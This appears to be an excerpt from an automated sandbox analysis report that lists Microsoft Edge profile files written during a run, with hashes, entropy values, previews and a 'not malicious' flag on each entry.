                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33
                                                                                                                                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                              MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                              SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                              SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                              SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):307
                                                                                                                                                                                                                              Entropy (8bit):5.245904198253806
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HU73r1CHhJ23oH+Tcwtp3hBtB2KLlVU73+q2PCHhJ23oH+Tcwtp3hBWsIFUv:GnYebp3dFLO3+vBYebp3eFUv
                                                                                                                                                                                                                              MD5:9581D64CA7AF07EA2C8C485AADD83D7D
                                                                                                                                                                                                                              SHA1:5516E3A20B5791416B149FEE644F8FA5A446F3D2
                                                                                                                                                                                                                              SHA-256:2A9935A9CE92789B8E9AB766ACC109EA245F577C892B70FF6A29BF5247D0A6A8
                                                                                                                                                                                                                              SHA-512:58847DD562A13EA77D8D2504B71077E1D22A6ECE9F6059053F654427FC40E0DBF32465906FF0F773F9C6D5C42B3B6639F9B26A207AAE1B42B2DF920509CE9AC8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:44.101 dcc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/18-10:53:44.437 dcc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):81875
                                                                                                                                                                                                                              Entropy (8bit):6.082015074755965
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:hQ60h81vrPI3lFdSn1EItRjRzkGJTPILJkkcq5OQxa:hKS15tRdAYDI1JcYxa
                                                                                                                                                                                                                              MD5:47F4783ABFBE22F3E7EAB17BB614B230
                                                                                                                                                                                                                              SHA1:21B15755351B7E9998F5131CBB842747469D267E
                                                                                                                                                                                                                              SHA-256:A31EE3779924092801BB446A9E818D32FE5EECCD41F8E1DADA8BFAEB65EB35CF
                                                                                                                                                                                                                              SHA-512:8F17765E813A2411033363D42F161303455E4C0D26EC2E277DB0D3F38BEC2D08BE29443CC258E539406ADE58A608F8FE7C56A2C2A2F3BF559C6B8E4DC0A7F270
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1.Go..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340967444415546.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):333
                                                                                                                                                                                                                              Entropy (8bit):5.1766894150156295
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HU7klQi+q2PCHhJ23oH+Tcwt9Eh1tIFUt8YU752WZmw+YU7IGFNVkwOCHhJ23oH/:GklD+vBYeb9Eh16FUt8152W/+173V56w
                                                                                                                                                                                                                              MD5:7C44DE0A57609562A7B1904587B6BB6B
                                                                                                                                                                                                                              SHA1:989201DAFC2D0B8AACE1BD779E0AC11187C8B9FC
                                                                                                                                                                                                                              SHA-256:875F42BB0C950617881CDEA3591D070549B0FCBEBE5F906A384323E569E01E44
                                                                                                                                                                                                                              SHA-512:E77C690C79A74F4C2F2CB362A60D4B684E793194C05B9114C3935464D9C0F51D3D4BFBF1CAC100204679870C075DE9AD444EF4FA958C76F2956231A243419218
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:43.809 95c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/18-10:53:43.811 95c Recovering log #3.2024/11/18-10:53:43.819 95c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):333
                                                                                                                                                                                                                              Entropy (8bit):5.1766894150156295
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HU7klQi+q2PCHhJ23oH+Tcwt9Eh1tIFUt8YU752WZmw+YU7IGFNVkwOCHhJ23oH/:GklD+vBYeb9Eh16FUt8152W/+173V56w
                                                                                                                                                                                                                              MD5:7C44DE0A57609562A7B1904587B6BB6B
                                                                                                                                                                                                                              SHA1:989201DAFC2D0B8AACE1BD779E0AC11187C8B9FC
                                                                                                                                                                                                                              SHA-256:875F42BB0C950617881CDEA3591D070549B0FCBEBE5F906A384323E569E01E44
                                                                                                                                                                                                                              SHA-512:E77C690C79A74F4C2F2CB362A60D4B684E793194C05B9114C3935464D9C0F51D3D4BFBF1CAC100204679870C075DE9AD444EF4FA958C76F2956231A243419218
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:43.809 95c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/18-10:53:43.811 95c Recovering log #3.2024/11/18-10:53:43.819 95c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                              Entropy (8bit):0.45475505266310123
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwjfBLjbw:TouQq3qh7z3bY2LNW9WMcU4B7
                                                                                                                                                                                                                              MD5:B65B96EAC16DC19B6BAE55F5492DDBCC
                                                                                                                                                                                                                              SHA1:B0506F40F84653A5D51D0443DDDFD23B2B6BDD20
                                                                                                                                                                                                                              SHA-256:F41AE2E50AD070100A0A4DABE6B8819CDE7FC4BAE0113AC3301BEB1383CA94D8
                                                                                                                                                                                                                              SHA-512:8FAB93799CB7483C67C6654A9AF44CFD057835E71D866901BB0B65E44F8487C7C8CCF073734C954AAB029FF8A9DBB7E1F0468FEC1E30B6BAC1F456247C79CD15
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                              Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                              MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                              SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                              SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                              SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                              Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZlyFKtl:/M/xT02zJul
                                                                                                                                                                                                                              MD5:5F1A357BE21CAE3BD9D2E1C1B0B9CBB6
                                                                                                                                                                                                                              SHA1:24DC4306FC314CDAE76882F8D2C7AB5CC821C1B5
                                                                                                                                                                                                                              SHA-256:F7A84F371A42D1D6166F8982D247709D97F4410964E1150C02346DEB4F8483EF
                                                                                                                                                                                                                              SHA-512:B198106B1482937808BA6210BDB0398C67F6050D9D6534E715B682B7BD678C456AB4BE0354BD483C43948BF05202E6C4385EE32C9304E13E4FA4C0179F70B690
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):348
                                                                                                                                                                                                                              Entropy (8bit):5.210520084710236
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUPpE9+q2PCHhJ23oH+TcwtnG2tMsIFUt8YU8NJZmw+YU8N9VkwOCHhJ23oH+Tci:Kpi+vBYebn9GFUt8O/+KV56Yebn95J
                                                                                                                                                                                                                              MD5:F3C0FA569858B0E9AF4F667F028D4475
                                                                                                                                                                                                                              SHA1:B7F64CF1B82F913DFDCA643E4B6AEE0ADEE01154
                                                                                                                                                                                                                              SHA-256:659BCF75897ADE2F625371B5D8083567A629DF346D0718EC14990F038C1BE115
                                                                                                                                                                                                                              SHA-512:DC1432410B4F9B6C1E2769553B0BCD24AD248EE066AF5703833EEFBC815D0FFC42E8E15DE01F839110138318B2356BD6332C07BF53F73894D8077BA5F0A3841B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.442 1e2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/18-10:53:35.455 1e2c Recovering log #3.2024/11/18-10:53:35.455 1e2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):348
                                                                                                                                                                                                                              Entropy (8bit):5.210520084710236
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUPpE9+q2PCHhJ23oH+TcwtnG2tMsIFUt8YU8NJZmw+YU8N9VkwOCHhJ23oH+Tci:Kpi+vBYebn9GFUt8O/+KV56Yebn95J
                                                                                                                                                                                                                              MD5:F3C0FA569858B0E9AF4F667F028D4475
                                                                                                                                                                                                                              SHA1:B7F64CF1B82F913DFDCA643E4B6AEE0ADEE01154
                                                                                                                                                                                                                              SHA-256:659BCF75897ADE2F625371B5D8083567A629DF346D0718EC14990F038C1BE115
                                                                                                                                                                                                                              SHA-512:DC1432410B4F9B6C1E2769553B0BCD24AD248EE066AF5703833EEFBC815D0FFC42E8E15DE01F839110138318B2356BD6332C07BF53F73894D8077BA5F0A3841B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.442 1e2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/18-10:53:35.455 1e2c Recovering log #3.2024/11/18-10:53:35.455 1e2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):33
                                                                                                                                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                              MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                              SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                              SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                              SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):311
                                                                                                                                                                                                                              Entropy (8bit):5.190772609381733
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HU72hq1CHhJ23oH+Tcwtk2WwnvB2KLlVU78q2PCHhJ23oH+Tcwtk2WwnvIFUv:GEGYebkxwnvFLO8vBYebkxwnQFUv
                                                                                                                                                                                                                              MD5:F036A0DA578B7DBCB5A804CCF7DCEFBE
                                                                                                                                                                                                                              SHA1:6B0F03EE3037DC13D919A35ADE47051B7FF60177
                                                                                                                                                                                                                              SHA-256:176CD3E62098AD8262C06E31EAEBF0E1CFA562E4180975048D77E7C718AFD221
                                                                                                                                                                                                                              SHA-512:CA474E35FBADF19AB8C19096A852B7D53C63A0871EEB623B8B5C0264FA21889234DEB410FBD714583D6C96DC294C3670D35F16472A47902EFB7D033F19E405E7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:43.835 10d0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/18-10:53:43.891 10d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):380
                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                              MD5:9FE07A071FDA31327FA322B32FCA0B7E
                                                                                                                                                                                                                              SHA1:A3E0BAE8853A163C9BB55F68616C795AAAF462E8
                                                                                                                                                                                                                              SHA-256:E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
                                                                                                                                                                                                                              SHA-512:9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                              Entropy (8bit):5.216193072633667
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUl3+q2PCHhJ23oH+Tcwt8aPrqIFUt8YUGZmw+YUCVkwOCHhJ23oH+Tcwt8amLJ:cOvBYebL3FUt8E/+k56YebQJ
                                                                                                                                                                                                                              MD5:89B8619C25DA5819E1C004C9927EA3B3
                                                                                                                                                                                                                              SHA1:5A77C5462E5AA4F76B3211174C60FC96BCE726E3
                                                                                                                                                                                                                              SHA-256:6726BDF84849B82D51E46C6CC818BD69BDD90A2BFA9D624954D8E3AA32B7BD20
                                                                                                                                                                                                                              SHA-512:62E981A0F1040A0EC3CC82417D5B233F70024E5C4AE5A9CFB3E15ACC2B347514D6EF93A51503FEDA259ED80D2E1AD1A0B2139BCFB84FB3006B0920EF38096B0B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.328 1f28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/18-10:53:35.329 1f28 Recovering log #3.2024/11/18-10:53:35.329 1f28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                              Entropy (8bit):5.216193072633667
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUl3+q2PCHhJ23oH+Tcwt8aPrqIFUt8YUGZmw+YUCVkwOCHhJ23oH+Tcwt8amLJ:cOvBYebL3FUt8E/+k56YebQJ
                                                                                                                                                                                                                              MD5:89B8619C25DA5819E1C004C9927EA3B3
                                                                                                                                                                                                                              SHA1:5A77C5462E5AA4F76B3211174C60FC96BCE726E3
                                                                                                                                                                                                                              SHA-256:6726BDF84849B82D51E46C6CC818BD69BDD90A2BFA9D624954D8E3AA32B7BD20
